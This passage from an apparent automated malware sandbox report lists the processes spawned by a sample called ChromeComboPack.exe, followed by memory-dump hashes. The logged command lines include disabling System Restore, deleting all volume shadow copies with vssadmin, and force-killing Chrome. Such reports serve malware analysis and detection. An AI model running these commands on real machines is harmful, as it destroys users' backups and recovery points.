                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell -Command "Disable-ComputerRestore -Drive C:\\"
                                                                                                                                                                                                                                              Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:26
                                                                                                                                                                                                                                              Start time:04:39:07
                                                                                                                                                                                                                                              Start date:01/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:28
                                                                                                                                                                                                                                              Start time:04:39:11
                                                                                                                                                                                                                                              Start date:01/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell -Command "Enable-ComputerRestore -Drive C:\\"
                                                                                                                                                                                                                                              Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:29
                                                                                                                                                                                                                                              Start time:04:39:11
                                                                                                                                                                                                                                              Start date:01/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:30
                                                                                                                                                                                                                                              Start time:04:39:15
                                                                                                                                                                                                                                              Start date:01/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\vssadmin.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:vssadmin delete shadows /for=C: /all /quiet
                                                                                                                                                                                                                                              Imagebase:0x7ff6422b0000
                                                                                                                                                                                                                                              File size:145'920 bytes
                                                                                                                                                                                                                                              MD5 hash:B58073DB8892B67A672906C9358020EC
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:31
                                                                                                                                                                                                                                              Start time:04:39:15
                                                                                                                                                                                                                                              Start date:01/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:32
                                                                                                                                                                                                                                              Start time:04:40:28
                                                                                                                                                                                                                                              Start date:01/12/2024
                                                                                                                                                                                                                                              Path:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe"
                                                                                                                                                                                                                                              Imagebase:0x7ff78c9b0000
                                                                                                                                                                                                                                              File size:17'046'266 bytes
                                                                                                                                                                                                                                              MD5 hash:8FD73177DC4A6FCC03F8E0307960A488
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:33
                                                                                                                                                                                                                                              Start time:04:40:29
                                                                                                                                                                                                                                              Start date:01/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:34
                                                                                                                                                                                                                                              Start time:04:40:32
                                                                                                                                                                                                                                              Start date:01/12/2024
                                                                                                                                                                                                                                              Path:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe"
                                                                                                                                                                                                                                              Imagebase:0x7ff78c9b0000
                                                                                                                                                                                                                                              File size:17'046'266 bytes
                                                                                                                                                                                                                                              MD5 hash:8FD73177DC4A6FCC03F8E0307960A488
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:35
                                                                                                                                                                                                                                              Start time:04:40:37
                                                                                                                                                                                                                                              Start date:01/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:taskkill /F /IM chrome.exe
                                                                                                                                                                                                                                              Imagebase:0x7ff6557b0000
                                                                                                                                                                                                                                              File size:101'376 bytes
                                                                                                                                                                                                                                              MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Reset < >
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4885151489.00007FFD34590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd34590000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: P?n4$P?n4$` t4
                                                                                                                                                                                                                                                • API String ID: 0-4275023014
                                                                                                                                                                                                                                                • Opcode ID: 4a8a7b4c9bfe8e4c227f1301fd4fc31ebddcf4fa5b3a732bfe28e4a6587ab727
                                                                                                                                                                                                                                                • Instruction ID: 41bcb5759229712f4ed7ae8757221a24aefb09a0fe50062b54e6e5fa51865c6d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4a8a7b4c9bfe8e4c227f1301fd4fc31ebddcf4fa5b3a732bfe28e4a6587ab727
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B721522F0DB8A0FE7A79A6858A51B47BE1EF87221B0901FBD14DC7193DE1DAC46C351
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4883358628.00007FFD344C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd344c0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: ^$^
                                                                                                                                                                                                                                                • API String ID: 0-3830990845
                                                                                                                                                                                                                                                • Opcode ID: 03147e91f3ecd910b0bda21fea3f7ddd4c2df82aa92d7df3971e6f84d346f117
                                                                                                                                                                                                                                                • Instruction ID: fc2ec53b0ebf941d8239e78365214df1c4d71065179ee7e3b7086df97a6f5850
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 03147e91f3ecd910b0bda21fea3f7ddd4c2df82aa92d7df3971e6f84d346f117
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F713A61A0E2DA4EEB02DB6898B53E93FE1EF53314F0A01BAD68DCB093DD5C54159790
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4883358628.00007FFD344C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd344c0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 0-3916222277
                                                                                                                                                                                                                                                • Opcode ID: 5ab0a42d95e2d64a8beb9c5daf57e91fd9cf7cbb48bb3738f68bcb4153aabc05
                                                                                                                                                                                                                                                • Instruction ID: 9817386a1b786fc105005253954a653a204c62aa8362e2e0f3328385faeaeee2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ab0a42d95e2d64a8beb9c5daf57e91fd9cf7cbb48bb3738f68bcb4153aabc05
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB91483170DA4C4FD764EA2CA8956B57BD1EF9B321F0502BBE44DC32A7C929DC828781
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4883358628.00007FFD344C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd344c0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: K.
                                                                                                                                                                                                                                                • API String ID: 0-1424947380
                                                                                                                                                                                                                                                • Opcode ID: b25613bd477754b4782935009552943337189da9e1aa055838dc88d2f278f346
                                                                                                                                                                                                                                                • Instruction ID: 9b31b07c14840b44bd0aa55630c7339c0b68f8e87518e8bb2875658c4f7baed5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b25613bd477754b4782935009552943337189da9e1aa055838dc88d2f278f346
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C821286294D6C96FE752DA2448792B8BFE0FF16250B0C00FFD588C719BDA589D488742
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4885151489.00007FFD34590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd34590000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: xCn4
                                                                                                                                                                                                                                                • API String ID: 0-668587626
                                                                                                                                                                                                                                                • Opcode ID: 5ed98a514590bdeb616b8be97cfaa2dc04b5609c87c28285885bf41e4a2035f1
                                                                                                                                                                                                                                                • Instruction ID: 1246e633d787dbdc2c6071300ed78857401e078b424416f02c24605ed4a1509f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ed98a514590bdeb616b8be97cfaa2dc04b5609c87c28285885bf41e4a2035f1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D11E732F0E6894FEB56DE6880A01B87BF1EF56310F1801BEC54CD7097EA296849C311
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4883358628.00007FFD344C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd344c0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 1f7d811af8f5be22f803964e5fda86a2394cbd673d06dfdbd779c689d8d0bd15
                                                                                                                                                                                                                                                • Instruction ID: 08b90c4ece62576aa036735420a2bd1d1a63c1910e27adc139d6d193a2b022b7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f7d811af8f5be22f803964e5fda86a2394cbd673d06dfdbd779c689d8d0bd15
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F9224B3460894D8FDF98EF1CC898AA937E1FF69301F0501A9E95ED72A6DA75EC41CB40
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4883358628.00007FFD344C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd344c0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 2ea1ec48a56b3850b852238809670a71cc7793cfdec1da0eea08a4413b0c61e8
                                                                                                                                                                                                                                                • Instruction ID: add3650ee40c0b554b36cb96c20e894b4458dca0ae88ff69607dd0538d5e2131
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2ea1ec48a56b3850b852238809670a71cc7793cfdec1da0eea08a4413b0c61e8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2B13670A1CB884FD749EF1CC495AB5BBE1FF96310F14017ED48AC32A6DA69E846CB41
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4883358628.00007FFD344C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd344c0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 89ffd8657fa9b9ce6755ebfb2510cb048f0e2c484c98f65480f90d7e326d7610
                                                                                                                                                                                                                                                • Instruction ID: 701a82940405d0a9301d6dd902e9db4ad029587abfb0c080465a1b3f7d425aaf
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 89ffd8657fa9b9ce6755ebfb2510cb048f0e2c484c98f65480f90d7e326d7610
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 33819321B19D0E4BEBA5FB5894A56BD63D2EF9A300B410179D05EC32E7DE2CAC428740
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4883358628.00007FFD344C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd344c0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 5cf17a38fd96102c54d5046632a6e490a74c7a9f8402a8c519ca42c94e153bc9
                                                                                                                                                                                                                                                • Instruction ID: bb193fe14ea5112c187eae25ca441c948d3d2b46d90be5125403bdbcfcdc4f52
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5cf17a38fd96102c54d5046632a6e490a74c7a9f8402a8c519ca42c94e153bc9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F811152191E7C95FD7079B344869595BFB0EE13210B1E01EBD488CB1A3DA695C58C7A2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4883358628.00007FFD344C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd344c0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d43f5e98c647ebeb9e2adb0a3f0d775618d59b8175a7b748a0f5bd8eff2fcedf
                                                                                                                                                                                                                                                • Instruction ID: 22d3ed8942b21fc65a1dbf709a15d217c53fed1c505345f10bcf345845130841
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d43f5e98c647ebeb9e2adb0a3f0d775618d59b8175a7b748a0f5bd8eff2fcedf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14512B31B1D9184FEB55EB58C8A57B977E1EF96300F0101B9E94ED3297DD28EC028B81
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4883358628.00007FFD344C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd344c0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 035bee6b6d82307998c172d27627d444fba5f97ea0119f4f35837fcdc210839b
                                                                                                                                                                                                                                                • Instruction ID: 5608363aa777e1238292f5a95e88f24701ef04ed098dbf079ab069056b303c1e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 035bee6b6d82307998c172d27627d444fba5f97ea0119f4f35837fcdc210839b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 13517B61B0EA094FEBA5AA3848A96B53BD1DF57250F0600BBD54EC31E7DD5DA8428381
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4883358628.00007FFD344C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd344c0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: c9be9dbbce76e3b74867bd260c1f0f9682bc99ce66385624e915fade1d417fdd
                                                                                                                                                                                                                                                • Instruction ID: 555a1c95ac16c456b53f855c26a52c190b61f8e60ff2810a479e2e97415acc9f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c9be9dbbce76e3b74867bd260c1f0f9682bc99ce66385624e915fade1d417fdd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0C41E73131581C8FDA98EB1CE898E6877E1FF6D31271605E6E44ACB275DA66DC81CB40
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4883358628.00007FFD344C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd344c0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: decc457df27df245261369fb4806b0b1ce43be7b58ce55e93f045a4c323ecdb0
                                                                                                                                                                                                                                                • Instruction ID: 1b415bdc38dced8681889fddd506c6e25a9fb80f8a8abba8b370f20154ed849a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: decc457df27df245261369fb4806b0b1ce43be7b58ce55e93f045a4c323ecdb0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE418020B0DD0A9FEBA4FB6C84A5AB573D1EFA6310B150579D14EC32ABDD6CE8419740
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4883358628.00007FFD344C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd344c0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 977b7ca748d3c068ab04765550843910fd449c407e255f2cd523cf1ea87092a9
                                                                                                                                                                                                                                                • Instruction ID: aadd39c7ae03b535dfb3113ca1a68a4c8130ea5d240ed1679994b1498272fe7b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 977b7ca748d3c068ab04765550843910fd449c407e255f2cd523cf1ea87092a9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B441E560A0E68A8FEB55DB6898B13B93BE1EF47314F0501BAE14DC31D7DEAC5815C781
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4883358628.00007FFD344C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd344c0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d8818513bb38713b1c6ad370b4aba6e92c1fe36591c8c6521ad7e605eb994235
                                                                                                                                                                                                                                                • Instruction ID: 69068f79a018b874f5e06cc530ca2b85c51ad291206135cbdc3d2ef9b637c009
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d8818513bb38713b1c6ad370b4aba6e92c1fe36591c8c6521ad7e605eb994235
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D5310E20B0ED194FEBA5EB2C88A4B7577D2EF9A300B1541BAD10EC7697DD5CAC82C740
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4882011205.00007FFD343AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343AD000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd343ad000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 533d749c4f43ddaacb6dd4e6af8f8827707fe56f3842512d3423f7953bffb80b
                                                                                                                                                                                                                                                • Instruction ID: b36c577b751eac7b66e8765db60f0037e24a19b824ee777cef147302b84f71b9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 533d749c4f43ddaacb6dd4e6af8f8827707fe56f3842512d3423f7953bffb80b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F9413C7184EBC44FE756EB3998959523FF0EF53320B1905DFD088CB1A3D629A846C7A2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4883358628.00007FFD344C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd344c0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 3a9dc98caaf545f72a90ea611dcbb50d30283f390cd428d9dec0eea06a128ceb
                                                                                                                                                                                                                                                • Instruction ID: 5b0a6eae049cadc17e1c65ffbe002869378c987be94a697590a7963b8be2f229
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a9dc98caaf545f72a90ea611dcbb50d30283f390cd428d9dec0eea06a128ceb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8310B27B4E6995FD712666CBCA10E97F64DF83235B0902F3D2D8CA093D80C544A83A1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4883358628.00007FFD344C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd344c0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: f9a9845a1f3a1cf657ac062b0198cc92590a4a0c02cef79998e924ef73d801ac
                                                                                                                                                                                                                                                • Instruction ID: e9b9ccc0e5cd19b5948ebd71887a5bc6f773149baa6ca9a561aaeb20eb53a40a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f9a9845a1f3a1cf657ac062b0198cc92590a4a0c02cef79998e924ef73d801ac
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 91314D317099098FD7A8EF2CD4A8A9877E1FF4931174601BAE589C7675DB24ECC1CB81
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4885151489.00007FFD34590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd34590000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 56addaf6da298c9feaf61de1ac38cd93eb96625b390c643f9196914e83f5b0b4
                                                                                                                                                                                                                                                • Instruction ID: a1f9c44acf3c7878b00af7d1bc03568132052f3dcafa709554c230d4794aac02
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 56addaf6da298c9feaf61de1ac38cd93eb96625b390c643f9196914e83f5b0b4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8121B422F0EAC64FE7AADA1C84F017466E1EF87212B5901BAD25DC71D2DE3CEC059341
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4883358628.00007FFD344C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd344c0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
